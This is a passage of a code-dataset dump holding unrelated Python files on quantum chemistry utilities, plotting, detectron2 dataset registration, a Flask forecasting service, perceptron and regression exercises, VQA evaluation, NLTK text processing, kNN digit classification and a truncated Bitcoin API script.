\n\t\telse:\n\t\t\tinit_state = HartreeFock(num_spin_orbitals, num_particles, converter)\n\t\t\treturn qubit_op, init_state\n\n\ndef unpack_functions(pack):\n\t\"\"\"\n\tUnpack the list where the first element is the index of the async execution, the second index in the function to\n\trun, the third index are the function variables, and the last index (if provided) are the optional arguments.\n\n\tParameter\n\t---------\n\tpack: list\n\t\tList with all the data\n\n\t Return\n\t ------\n\t Result of the function\n\t\"\"\"\n\tif len(pack) < 4: # If no optional arguments are provided\n\t\tpack.append({})\n\treturn [pack[0], pack[1](*pack[2], **pack[3])]\n\n\ndef sort_solution(data):\n\t\"\"\"\n\tFunction to sort the data obtained for a parallel computation\n\n\tParameter\n\t---------\n\tdata: list\n\t\tList in which each entry represents one solution of the parallel computation. 
The elements are\n\t\talso list which contains in the first element the index and in the second one the result of the computation.\n\n\tReturn\n\t------\n\tList with the data sorted\n\t\"\"\"\n\tn = len(data) # Extract the number of computations done\n\tsorted_sol = [None] * n # Empty list with the correct number of elements\n\tfor i in range(n): # Iterate over all the elements\n\t\tindex = data[i][0] # Obtain the index of the result\n\t\ttemp = data[i][1] # Obtain the result\n\t\tsorted_sol[index] = temp # Save the result in the correct element\n\n\treturn sorted_sol\n\n\ndef isnotebook():\n\t\"\"\"\n\tCheck if the script is been running in a jupyter notebook instance\n\n\tReturn\n\t------\n\tTrue is the instance is a Jupyter notebook, false in other cases\n\t\"\"\"\n\ttry:\n\t\tshell = get_ipython().__class__.__name__\n\t\tif shell == 'ZMQInteractiveShell':\n\t\t\treturn True # Jupyter notebook or qtconsole\n\t\telif shell == 'TerminalInteractiveShell':\n\t\t\treturn False # Terminal running IPython\n\t\telse:\n\t\t\treturn False # Other type (?)\n\texcept NameError:\n\t\treturn False # Probably standard Python interpreter\n\n\ndef permutate_indices(diagonal_factors, qubit0, qubit1, n_qubits):\n\t\"\"\"\n\tPermute the diagonal factors indices by the interchange of qubit_0 <---> qubit_1, maintaining all other indices the\n\tsame.\n\n\tParameters\n\t----------\n\tdiagonal_factors: ndarray (2 ** n_qubits)\n\t\tDiagonal factors for the computation of the expected energy\n\tqubit0: int\n\t\tIndex of the first qubit to swap\n\tqubit1: int\n\t\tIndex of the second qubit to swap\n\tn_qubits: int\n\t\tNumber of qubits in the circuit\n\n\tReturn\n\t------\n\ttemp: ndarray (2 ** n_qubits)\n\t\tRefactor diagonal factors\n\t\"\"\"\n\ttemp = np.zeros(2 ** n_qubits)\n\n\t# Iterate over all the possible outputs of the circuit\n\tfor i in range(len(temp)):\n\t\tnew = bin(i)[2:] # New index in binary\n\t\tif len(new) < n_qubits: # Complete with 0's if the index is not of the correct size\n\t\t\tnew = ''.join(['0']) * (n_qubits - len(new)) + new\n\t\told = swapPositions(new, qubit0, qubit1) # Swap the indices of qubit_0 and qubit_1\n\t\ttemp[int(new, 2)] = diagonal_factors[int(old, 2)] # Copy the old diagonal factor in the new position\n\n\treturn temp\n\n\ndef swapPositions(str_variable, pos1, pos2):\n\t\"\"\"\n\tSwap the position of two indices of a given string.\n\n\tParameters\n\t----------\n\tstr_variable: str\n\t\tString to interchange the indices. The length must be >= max(pos1, pos2)\n\tpos1: int\n\t\tIndex of the first element to swap\n\tpos2: int\n\t\tIndex of the second element to swap\n\n\tReturn\n\t------\n\tReformat string with the given swaps\n\t\"\"\"\n\tlist_variable = list(str_variable)\n\tlist_variable[pos1], list_variable[pos2] = list_variable[pos2], list_variable[pos1]\n\treturn ''.join(list_variable)\n\n\ndef swaps(arr, reverse=True):\n\t\"\"\"\n\tCompute the needed swaps of two elements to sort a given array in descending (or ascending) order.\n\n\tParameters\n\t----------\n\tarr: list\n\t\tOriginal array with unsorted numbers [0, 1, ...., len(arr) - 1]. A given element can not appear twice.\n\treverse: bool (optional, default=True)\n\t\tIf reverse=True, sort in descending order, if reverse=False, sort in ascending order\n\n\tReturns\n\t-------\n\tswaps: ndarray (n, 2)\n\t\tArray containing the indices needed to perform a total of n swaps. Each swap corresponds to a given row. 
The\n\t\tswaps must be performed in the correct order, starting from swaps[0], and finish in swaps[-1].\n\t\"\"\"\n\t# If descending order, reverse the order of the original array\n\tif reverse:\n\t\tarr = arr[::-1]\n\tn = len(arr) # Number of elements\n\tswaps = [] # List with the swaps\n\n\t# Start the algorithm\n\ti = 0\n\twhile i < n:\n\t\tif arr[i] != i: # If the element is not in the correct locations\n\t\t\tswaps.append(np.array([i, arr[i]]))\n\t\t\t# Interchange the element with the correct element in a given location\n\t\t\tarr[arr[i]], arr[i] = arr[i], arr[arr[i]]\n\t\telse:\n\t\t\ti += 1\n\n\tswaps = np.array(swaps)\n\n\t# If descending order, transform the indices in each swap. E.g. if N = 3: 0 --> |0 - 3 + 1| = 2, 1 -> 1 and 2 -> 0\n\tif reverse:\n\t\tswaps = np.abs(swaps - n + 1)\n\n\treturn swaps\n","sub_path":"Codes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222811938","text":"import matplotlib.pyplot as plt\r\nplt.rcParams['font.sans-serif']=['SimHei'] # 用来正常显示中文标签\r\nimport matplotlib.font_manager as fm # 字体管理器\r\n\r\n\r\ndef run_data():\r\n data = {\r\n \"Query AvRE\": [6.85e-04,8.22e-03,8.15e-02,8.54],\r\n \"Freq Patten AvRE\": [0.13,1.08,1.24,1.31],\r\n \"Trip Error\": [2.27e-03,4.17e-02,3.67e-01,6.80e-01],\r\n \"Diameter Error\": [1.04e-05,4.98e-04,0.27,0.41]\r\n }\r\n return data\r\n\r\n\r\ndef get_plot(metrics, data):\r\n x_data = [0.1, 0.5, 1, 2]\r\n rage = [str([0.0001, 0.00099]), str([0.001, 0.0099]), str([0.01, 0.099]), str([0.1, 0.99])]\r\n paper_data = {\r\n \"Query AvRE\": [0.295, 0.203, 0.171, 0.159],\r\n \"Freq Patten AvRE\": [0.340, 0.329, 0.322, 0.329],\r\n \"Trip Error\": [0.071, 0.054, 0.034, 0.017],\r\n \"Diameter Error\": [0.103, 0.089, 0.078, 0.076]\r\n }\r\n # 防止乱码\r\n plt.rcParams[\"font.sans-serif\"] = [\"SimHei\"]\r\n plt.rcParams[\"axes.unicode_minus\"] = False\r\n plt.plot(rage, data, color=\"red\", marker=\"*\", label=\"offset\")\r\n # plt.plot(x_data, data, color=\"red\", marker=\"*\", label=\"geolife\")\r\n # plt.plot(x_data, paper_data[metrics], color=\"blue\", marker=\"o\", label=\"paper\")\r\n plt.ylabel(\"指标结果\")\r\n plt.title(metrics)\r\n plt.legend()\r\n plt.savefig('../data/Geolife Trajectories 1.3/' + metrics + \".jpg\")\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n for index, key in run_data().items():\r\n get_plot(index, key)\r\n","sub_path":"utils/get_plot.py","file_name":"get_plot.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"488216060","text":"# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserv\nimport detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\nimport os\n# import some common libraries\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom google.colab.patches import cv2_imshow\nfrom detectron2.data.datasets import load_coco_json\n\n# import some common detectron2 utilities\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\n\nWINDOW_NAME = \"detections\"\n\n# inference\nINPUT_IMG_PATH = '/home/sxm/cocodataset/ftb/images/train'\nOUTPUT_IMG_PATH = '/home/sxm/cocodataset/ftb/out'\n\n# 数据集路径\nDATASET_ROOT = '/home/sxm/cocodataset/ftb'\nANN_ROOT = os.path.join(DATASET_ROOT, 'annotations')\nTRAIN_PATH = os.path.join(DATASET_ROOT, 'images', 'train')\nVAL_PATH = os.path.join(DATASET_ROOT, 'images', 'val')\nTRAIN_JSON = os.path.join(ANN_ROOT, 'train', 'trainval.json')\nVAL_JSON = os.path.join(ANN_ROOT, 'val', 'trainval.json')\n\n# 数据集类别元数据\nDATASET_CATEGORIES = [\n {\"name\": \"ball\", \"id\": 1, \"isthing\": 1, \"color\": [220, 20, 60]},\n {\"name\": \"man\", \"id\": 2, \"isthing\": 1, \"color\": [219, 142, 185]},\n]\n\n# 数据集的子集\nPREDEFINED_SPLITS_DATASET = {\n \"football\": (TRAIN_PATH, TRAIN_JSON),\n \"footballval\": (VAL_PATH, VAL_JSON),\n}\n\n\ndef register_dataset():\n \"\"\"\n purpose: register all splits of dataset with PREDEFINED_SPLITS_DATASET\n \"\"\"\n for key, (image_root, json_file) in PREDEFINED_SPLITS_DATASET.items():\n register_dataset_instances(name=key,\n metadate=get_dataset_instances_meta(),\n json_file=json_file,\n image_root=image_root)\n\n\ndef get_dataset_instances_meta():\n \"\"\"\n purpose: get metadata of dataset from DATASET_CATEGORIES\n return: dict[metadata]\n \"\"\"\n thing_ids = [k[\"id\"] for k in DATASET_CATEGORIES if k[\"isthing\"] == 1]\n thing_colors = [k[\"color\"] for k in DATASET_CATEGORIES if k[\"isthing\"] == 1]\n # assert len(thing_ids) == 2, len(thing_ids)\n thing_dataset_id_to_contiguous_id = {k: i for i, k in enumerate(thing_ids)}\n thing_classes = [k[\"name\"] for k in DATASET_CATEGORIES if k[\"isthing\"] == 1]\n thing_dataset_id_to_contiguous_id = {0: 0, 1: 1}\n ret = {\n \"thing_dataset_id_to_contiguous_id\": thing_dataset_id_to_contiguous_id,\n \"thing_classes\": thing_classes,\n \"thing_colors\": thing_colors,\n }\n return ret\n\n\ndef register_dataset_instances(name, metadate, json_file, image_root):\n \"\"\"\n purpose: register dataset to DatasetCatalog,\n register metadata to MetadataCatalog and set attribute\n \"\"\"\n DatasetCatalog.register(name, lambda: load_coco_json(json_file, image_root, name))\n MetadataCatalog.get(name).set(json_file=json_file,\n image_root=image_root,\n evaluator_type=\"coco\",\n **metadate)\n\n\n# 注册数据集和元数据\ndef plain_register_dataset():\n DatasetCatalog.register(\"football\", lambda: load_coco_json(TRAIN_JSON, TRAIN_PATH, \"football\"))\n MetadataCatalog.get(\"football\").set(thing_classes=[\"ball\", \"man\"],\n json_file=TRAIN_JSON,\n image_root=TRAIN_PATH)\n DatasetCatalog.register(\"footballval\", lambda: load_coco_json(VAL_JSON, VAL_PATH, \"footballval\"))\n MetadataCatalog.get(\"footballval\").set(thing_classes=[\"ball\", \"man\"],\n json_file=VAL_JSON,\n image_root=VAL_PATH)\n\nfrom detectron2.data.datasets import register_coco_instances\n#register_coco_instances(\"fruits_nuts\", {}, \"/home/sxm/cocodataset/data/trainval.json\", 
\"/home/sxm/cocodataset/data/images\")\n\nregister_dataset()\n\nfruits_nuts_metadata = MetadataCatalog.get(\"football\")\ndataset_dicts = DatasetCatalog.get(\"football\")\n\nimport random\n\nfor d in random.sample(dataset_dicts, 3):\n img = cv2.imread(d[\"file_name\"])\n visualizer = Visualizer(img[:, :, ::-1], metadata=fruits_nuts_metadata, scale=0.5)\n vis = visualizer.draw_dataset_dict(d)\n #cv2_imshow(vis.get_image()[:, :, ::-1])\n plt.figure()\n plt.imshow(vis.get_image()[:, :, ::-1])\n plt.show()","sub_path":"demo/coco_ftb.py","file_name":"coco_ftb.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"422033594","text":"#!/usr/bin/python3\n\nimport argparse\nimport atexit\nimport signal\nfrom flask import Flask\nfrom utils.logger import setup_logger, get_logger\nfrom exception.engine_computation_exception import EngineComputationException\nimport time_series_analysis_controller\nimport exception_handler\n\napp = Flask(__name__)\napp.add_url_rule(\"/time-series-analysis/forecast\", methods=['POST'],\n view_func=time_series_analysis_controller.forecast)\napp.add_url_rule(\"/time-series-analysis/forecast-accuracy\", methods=['POST'],\n view_func=time_series_analysis_controller.compute_accuracy_of_forecast)\napp.add_url_rule(\"/time-series-analysis/predict\", methods=['POST'],\n view_func=time_series_analysis_controller.predict)\napp.register_error_handler(EngineComputationException, exception_handler.handle_engine_computation_exception)\n\n\ndef on_shutdown():\n get_logger().info(\"Engine will shutdown\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--port\", dest=\"port\", help=\"port to run python engine\", required=True)\n parser.add_argument(\"--logs-path\", dest=\"logs_path\", help=\"location to dump logs\", required=True)\n args = parser.parse_args()\n\n logger = setup_logger(args.logs_path, args.port)\n atexit.register(on_shutdown)\n signal.signal(signal.SIGTERM, on_shutdown)\n signal.signal(signal.SIGINT, on_shutdown)\n logger.info(\"Engine is up\")\n app.run(host='0.0.0.0', port=args.port)\n","sub_path":"engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"464072632","text":"\"\"\"\nFecha: 26 -ago-2019\n\n\"\"\"\n\n#%% importar librerias\nimport numpy as np\n\n#%% Funciones:\ndef signo(net):\n fsigno = [1. if elem >=0 else -1. for elem in net]\n return fsigno\n\ndef signo_escalar(net_escalar):\n y_pred = 1 if net_escalar >=0 else -1\n return y_pred\n\ndef iniciar_pesos(num_features):\n W = np.random.rand(num_features + 1)\n bias_val = np.random.random()\n W[2] = bias_val\n return W\n\ndef net(x_input, W):\n Net = np.dot(x_input, np.transpose(W))\n return Net\n\ndef funcion_error(y_verdadero, y_predicho):\n cont = 0\n for indice, y_i in enumerate(y_predicho):\n if y_i != y_verdadero[indice]:\n cont = cont+1\n return cont\n\n#%% programa\n# Definiendo el dataset de entrada\nX = np.array([[-1, -1],\n [-1, 1],\n [1,-1],\n [1, 1]], dtype=np.float)\n\n# Definiendo las salidas\nY = np.array([[-1],[1],[1],[1]], dtype=np.float)\n\nsamples, features = np.shape(X) # samples = muestra/ ejemplo. 
features = característica\nx_bias = -np.ones((samples,1))\nX_comp = np.concatenate((X, x_bias), axis=1)\n\n#---- Inicializacion de pesos\n# W = np.random.rand(features+1)\n# bias_val = np.random.random()\n# W[2] = bias_val\n\nW = iniciar_pesos(num_features=features)\n\n#---- Calcular Net\n# Net = np.dot(X_comp, np.transpose(W))\nNet = net(x_input=X_comp, W=W)\n#----\n\n#---- signo\n# signo_res = []\n# for elem in Net:\n# if elem >=0:\n# signo_res.append(1.)\n# else:\n# signo_res.append(-1.)\n\nY_pred = signo(Net)\n\nerror_v = funcion_error(y_verdadero=Y, y_predicho=Y_pred)\n\n# Algoritmo de Aprendizaje del Perceptron\n\nprint('error inicial {}'.format(error_v))\n\nlearning_rate = 0.01\nepoca = 0\nNum_Max_Epocas = 150\nterminar = False\n\nwhile(epoca Garbage in and Garbage out (i.e., if we provide too much of useless data we'll not gonna get useful output).\n# --> If our model depends on very large number of factors when not needed, accounting for them or explaining others\n# about those factors is a waste of time of both, ours and others as well as explaining such a large factors\n# itself is very difficult. \n#\n# - Methods of Building models:\n# --> All-in (generally useless and a wrong practice)\n# --> Backward Elimination\n# --> Forward Selection\n# --> Bidirectional Elimination\n# --> Score Comparison\n#\n# Generally Step-By-Step Regression covers the methods 2 to 4.\n# Many People also refer just the Bi-Directional Elimination as a Step-By-Step Regression.\n#\n# - `All-in` cases:\n# - Prior Knowledge (that these specific variables are going to be used)\n# - You have to include these varaibles and have no choice\n# - Preparing for Backward Elimination\n#\n# - `Backward Elimination` steps:\n# Step1 - Select a significance level to stay in the model (eg: Sl = 0.05, i.e., 5 percent)\n# Step2 - Fit the model with all possible predictors (All-in)\n# Step3 - Consider the predictor with the highest P-value. If P > Sl, go to step 4, otherwise go to FIN\n# Step4 - Remove the predictor\n# Step5 - Fit model without this predictor (or varaible) then Repeat Step3\n# FIN - Your Model is Ready.\n#\n# - `Forward Selection` steps:\n# Step1 - Select a significance level to enter the model (eg: Sl = 0.05)\n# Step2 - Fit all simple regression models y ~ x(n). Select the one with thre lowest P-value\n# Step3 - Keep this variable and fit all possible models with one extra predictor added to the one(s) you already \n# have\n# Step4 - Consider the predictor with lowest P-value. 
If P < Sl, go to step3, otherwise go to FIN.\n# FIN - Keep the previous model (i.e., the model before the addition of the last insignificant variable) as the\n# final model.\n#\n# - `Bi-Directional Elimination` steps:\n# Step1 - Select a significance level to enter and to stay in the model (eg: Sl_enter = 0.05, Sl_stay = 0.05)\n# Step2 - Perform the next step of Forward Selection (new variables must have: P < Sl_enter to enter)\n# Step3 - Perform All Steps of Backward Elimination (old variables must have p < Sl_stay to stay), then Repeat Step2\n# Step4 - No new Variables can enter and no old variables can exit\n# FIN - Your Model is Ready.\n#\n# - `Score Comparision (or All Possible Models)` steps:\n# Step1 - Select a criterion of goodness of fit.\n# Step2 - Construct All Possible Regression Models: 2**n - 1 total combinations\n# Step3 - Select the one with the best criterion\n# FIN - Your Model is Ready.\n# This Approach is too much resource consuming and hence not good for every time use.\n\n# ***** Model-Optimization: Backward Elimination *****\n# sklearn.linear_model library accounts for the constant b0, but statsmodels doesn't. So we need to add it manually.\n#\nimport statsmodels.formula.api as sm\nfeatures = np.append(arr=np.ones((50, 1)).astype(int), values=features, axis=1) # axis=1 for column and axis=0 for row.\n#\n# Using a threshold value of 0.05 for P-values.\n#\n# opt_features = features[:, [0, 1, 2, 3, 4, 5]] # Step1 - All-in\n# ols_regressor = sm.OLS(endog=output, exog=opt_features).fit() # Step2 - Fit the model\n# ols_regressor.summary() # Step3 - Consider the predictor with the highest P-value\n#\n# opt_features = features[:, [0, 1, 3, 4, 5]] # Step4 - Remove the predictor\n# ols_regressor = sm.OLS(endog=output, exog=opt_features).fit() # Step2\n# ols_regressor.summary() # Step3\n#\n# opt_features = features[:, [0, 3, 4, 5]] # Step4\n# ols_regressor = sm.OLS(endog=output, exog=opt_features).fit() # Step2\n# ols_regressor.summary() # Step3\n#\n#\n# Way-1: Using threshold values ----------------------------------------------\nopt_features = features[:, [0, 3, 5]] # Step4\nols_regressor = sm.OLS(endog=target, exog=opt_features).fit() # Step2\nols_regressor.summary() # Step3\nopt_features = features[:, [3]] # Step4\n# Removing not only feature-5 but also the feature-0 as it is the constant value we have added.\n\n# ***** Checking the Results with opt_features *****\nopt_training_features = training_features[:, [2]]\nopt_testing_features = testing_features[:, [2]]\nopt_regressor = LinearRegression()\nopt_regressor.fit(opt_training_features, training_target)\nopt_predicted_target = opt_regressor.predict(opt_testing_features)\nopt_error = abs(testing_target - opt_predicted_target)\n\n# ***** Visualising Results (Optimised) *****\n# - Visualising the Training set results\nplt.subplot(121)\nplt.scatter(opt_training_features, training_target, color='red')\nplt.plot(opt_training_features, opt_regressor.predict(opt_training_features), color='blue')\nplt.title('Profit vs R&D-Spend (Training-Set)')\nplt.xlabel('R&D Spend')\nplt.ylabel('Profit')\n# - Visualising the Test set results\nplt.subplot(122)\nplt.scatter(opt_testing_features, testing_target, color='red')\nplt.plot(opt_testing_features, opt_predicted_target, color='blue')\nplt.title('Profit vs R&D-Spend (Testing-Set)')\nplt.xlabel('R&D Spend')\nplt.ylabel('Profit')\nplt.show()\n\n\n# Way-2: Using Adjusted-R**2 values ------------------------------------------\nopt_features = features[:, [0, 3, 5]] # Step4\nols_regressor = 
sm.OLS(endog=target, exog=opt_features).fit() # Step2\nols_regressor.summary() # Step3\nopt_features = features[:, [0, 3]] # Step4\nols_regressor = sm.OLS(endog=target, exog=opt_features).fit() # Step2\nols_regressor.summary() # Step3\n# Since, the Adjusted-R value drops with the drop of variable no.-5, indicates us that the variable no.-5 is also an\n# effective variable (or regressor).\n\n# ***** Checking the Results with opt_features *****\nopt_training_features = training_features[:, [2, 4]]\nopt_testing_features = testing_features[:, [2, 4]]\nopt_regressor = LinearRegression()\nopt_regressor.fit(opt_training_features, training_target)\nopt_predicted_target = opt_regressor.predict(opt_testing_features)\nopt_error2 = abs(testing_target - opt_predicted_target)\n","sub_path":"02_Supervised/01_Regression/02_Mulitple_Linear_Regression/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":10142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"395772255","text":"import torch\r\nimport torch.utils.data as data\r\nfrom data_utils import get_vocab, VqaDataset, get_datasets\r\nfrom models import VqaModel\r\nimport os\r\nfrom parameters import DEVICE, BATCH_SIZE, N_WORKERS, PREPROCESSED_FILE_PATH\r\nfrom preprocess_images import preprocess_images\r\n\r\n\r\ndef evaluate_hw3():\r\n print('starting. device:', DEVICE)\r\n if not os.path.exists(PREPROCESSED_FILE_PATH):\r\n print('No preprocessed images found. Preprocessing. It will take ~hour')\r\n preprocess_images()\r\n vocabs = get_vocab()\r\n train_data, val_data = get_datasets(vocabs)\r\n val_loader = data.DataLoader(dataset=val_data, batch_size=BATCH_SIZE, shuffle=False, num_workers=N_WORKERS)\r\n input_text_size = train_data.question_vocab_size\r\n output_text_size = train_data.answer_vocab_size\r\n print('Loading model')\r\n model = VqaModel(input_text_size, output_text_size)\r\n model.load_state_dict(torch.load('model.pkl', map_location=lambda storage, loc: storage))\r\n model.to(DEVICE)\r\n model.eval()\r\n total_error = 0\r\n answers = {}\r\n print('Starting evaluation')\r\n\r\n batch_idx = 0\r\n for batch_sample in val_loader:\r\n images = batch_sample['image'].to(DEVICE)\r\n questions = batch_sample['question'].to(DEVICE)\r\n labels = batch_sample['answer'].to(DEVICE)\r\n\r\n items = batch_sample['item_no']\r\n with torch.set_grad_enabled(False):\r\n outputs = model(images, questions)\r\n _, predicted = torch.max(outputs.data, 1)\r\n\r\n num_answered = (predicted == labels).sum().item()\r\n error = 1 - num_answered / BATCH_SIZE\r\n total_error += error\r\n for i, item in enumerate(items):\r\n answers[item.item()] = predicted[i].item()\r\n batch_idx += 1\r\n del items\r\n del images\r\n average_error = total_error/(len(answers)/128)\r\n print('0-1 accuracy of multi-choice winner on validation set is:', 1-average_error)\r\n\r\n total_acc = 0\r\n for item, answer_list in enumerate(val_data.answers):\r\n my_answer = answers[item]\r\n count = answer_list.count(my_answer)\r\n accuracy = min(1, count/3)\r\n total_acc += accuracy\r\n\r\n print('VQA accuracy of all answers(https://visualqa.org/evaluation.html) on validataion set is:', total_acc/len(answers))\r\n\r\n\r\nif __name__ == '__main__':\r\n evaluate_hw3()","sub_path":"evaluate_hw3.py","file_name":"evaluate_hw3.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142786238","text":"import sys\n\nimport numpy\n\nCONSTANTS = 
{\n    # The value of relative tolerance for testing numerically tolerant\n    # equality.\n    'RTOL': sys.float_info.epsilon,\n    # The value of absolute tolerance for testing numerically tolerant\n    # equality.\n    'ATOL': sys.float_info.epsilon,\n}\n\n# --------------------------------------------------------------------\n# masked\n# --------------------------------------------------------------------\n'''A constant that allows data values to be masked by direct\nassignment. This is consistent with the behaviour of numpy masked\narrays.\n\nFor example, masking every element of a field construct's data array\ncould be done as follows:\n\n>>> f[...] = cfdm.masked\n\n'''\nmasked = numpy.ma.masked\n","sub_path":"cfdm/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"8872700","text":"import nltk\nfrom nltk.book import text1\nfrom nltk import sent_tokenize\nfrom nltk import word_tokenize\n\n\n# Open and read the text\ndef read_text(file):\n    file = open(file, encoding='utf_8_sig')\n    raw = file.read()\n    print(type(raw))\n    print(len(raw))\n    print(raw[:100])\n    print()\n\n\n# Word segmentation using word_tokenize()\ndef tokenize_word(file):\n    file = open(file, encoding='utf_8_sig')\n    raw = file.read()\n    tokens = word_tokenize(raw)\n    print(type(tokens))\n    print(len(tokens))\n    print(tokens[:10])\n    print()\n\n\n# Sentence segmentation using sent_tokenize()\ndef tokenize_sent(file):\n    file = open(file, encoding='utf_8_sig')\n    raw = file.read()\n    sent_tokens = sent_tokenize(raw)\n    print(type(sent_tokens))\n    print(len(sent_tokens))\n    print(sent_tokens[:10])\n    print()\n\n\n# Convert to a nltk Text (text = nltk.Text(tokens))\ndef convert_to_nltk(file):\n    file = open(file, encoding='utf_8_sig')\n    raw = file.read()\n    tokens = word_tokenize(raw)\n    text = nltk.Text(tokens)\n    print(text)\n    print()\n\n\n# Use nltk.FreqDist() to print the most common words in book and “Moby Dick”(text1)\ndef freq_dist(file):\n    file = open(file, encoding='utf_8_sig')\n    raw = file.read()\n    tokens = word_tokenize(raw)\n\n    freq_words1 = nltk.FreqDist(tokens)\n    print(freq_words1)\n    print(freq_words1.most_common(50))\n\n    freq_words2 = nltk.FreqDist(text1)\n    print(freq_words2)\n    print(freq_words2.most_common(50))\n\n\n# Call the functions\nread_text('158-0.txt')\ntokenize_word('158-0.txt')\ntokenize_sent('158-0.txt')\nconvert_to_nltk('158-0.txt')\nfreq_dist('158-0.txt')\n","sub_path":"homework_1.py","file_name":"homework_1.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"420637030","text":"import pandas as pd\n\nfrom typing import List\n\nfrom constants import location_constants\nfrom models.loader_tracking.location import Location, LocationZone\nfrom utils import converters\n\n\nclass LocationManager:\n\n    def __init__(self, locations: List[Location]):\n        self.locations = locations\n\n    def update_locations_list(self,\n                              zones_df: pd.DataFrame,\n                              shape_polygon_df: pd.DataFrame\n                              ):\n        \"\"\"\n        Updates the zones and the shape of the location\n        based on zones and shape polygon data frames\n        Note: the updates are performed in-place for\n        the sake of memory optimization.\n        :param locations:\n        :param zones_df:\n        :param shape_polygon_df:\n        \"\"\"\n\n        # Iterate and update location and zone shapes\n        for location in self.locations:\n            loc_shape_df = shape_polygon_df[shape_polygon_df[location_constants.location_shape_id] == 
location.id]\n            loc_shape_polygon = converters.shape_df_to_polygon(loc_shape_df)\n            location.polygon = loc_shape_polygon\n\n            # Extract information about zones for the corresponding location\n            loc_zones_df = zones_df[zones_df[location_constants.location_id] == location.id]\n            location_zones = []\n\n            for z_index, z_row in loc_zones_df.iterrows():\n                z_id = z_row[location_constants.zone_id]\n                z_name = z_row[location_constants.zone_name]\n                z_shape_id = z_row[location_constants.zone_shape_id]\n                z_timestamp = z_row[location_constants.zone_timestamp]\n\n                # Extract shape for each zone\n                z_shape_df = shape_polygon_df[shape_polygon_df[location_constants.zone_shape_id] == z_shape_id]\n                z_shape_polygon = converters.shape_df_to_polygon(z_shape_df)\n\n                zone = LocationZone(z_id, z_name, z_shape_polygon, z_timestamp)\n                location_zones.append(zone)\n\n            location.zones = location_zones\n\n","sub_path":"managers/location_manager.py","file_name":"location_manager.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"453769076","text":"import numpy as np\nfrom numpy import *\nfrom os import listdir # lists the file names in a given directory\nimport operator\n\n\n# Preprocess the image:\n# convert a 32x32 binary image matrix into a 1x1024 vector\ndef img2vector(filename):\n    returnVect = zeros((1, 1024))\n    fr=open(filename)\n    for i in range(32): # read the first 32 lines of the file\n        lineStr=fr.readline()\n        for j in range(32):\n            returnVect[0,32*i+j]=int(lineStr[j]) # read the first 32 character values of each line\n    return returnVect\n\n# kNN algorithm implementation\ndef classify0(inX,dataSet,labels,k):\n    dataSetSize=dataSet.shape[0]\n    diffMat=tile(inX,(dataSetSize,1))-dataSet # Euclidean distance: tile the input vector and subtract the training set\n    sqDiffMat=diffMat**2\n    sqDistances=sqDiffMat.sum(axis=1) # no axis argument sums everything; axis=0 sums by column, axis=1 sums along rows\n    distances=sqDistances**0.5\n    sortedDistTndicies = distances.argsort()\n    classCount={}\n    for i in range(k):\n        voteIlabel=labels[sortedDistTndicies[i]]\n        classCount[voteIlabel]=classCount.get(voteIlabel,0)+1\n    sortedClassCount=sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)\n    return sortedClassCount[0][0]\n\n\n\n\n\n\n# Test kNN on the handwriting data\ndef handwritingClassTest():\n    hwLabels=[]\n    trainingFileList=listdir('digits/trainingDigits')\n    m=len(trainingFileList)\n    trainingMat=zeros((m,1024))\n    for i in range(m): # parse the class digit from the file name\n        fileNameStr = trainingFileList[i]\n        fileStr = fileNameStr.split('.')[0]\n        classNumStr=int(fileStr.split('_')[0])\n        hwLabels.append(classNumStr)\n        trainingMat[i,:]=img2vector('digits/trainingDigits/%s'%fileNameStr) # get all binary characters of each image\n    testFileList=listdir('digits/testDigits')\n    errorCount=0.0\n    mTest=len(testFileList)\n    for i in range(mTest):\n        fileNameStr=testFileList[i]\n        fileStr=fileNameStr.split('.')[0]\n        classNumStr=int(fileStr.split('_')[0])\n        vectorUnderTest=img2vector('digits/testDigits/%s'%fileNameStr)\n        classifierResult=classify0(vectorUnderTest,trainingMat,hwLabels,3)\n        if classifierResult != classNumStr: errorCount += 1.0 # tally misclassifications for the error-rate report below\n\n    print('\\nthe total number of errors is: %d'%errorCount)\n    print('\\nthe total error rate is: %f'%(errorCount/float(mTest)))\n\nhandwritingClassTest()","sub_path":"ml-in-action-v3/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"551045210","text":"#!/usr/bin/env python3\nimport json\nfrom urllib.request import urlopen\n\nurlBlockHeight = urlopen('https://api.blockcypher.com/v1/btc/main').read()\nresultBlockHeight = json.loads(urlBlockHeight)\nblockheight = int(resultBlockHeight['height'])\n\nurlPrice = 
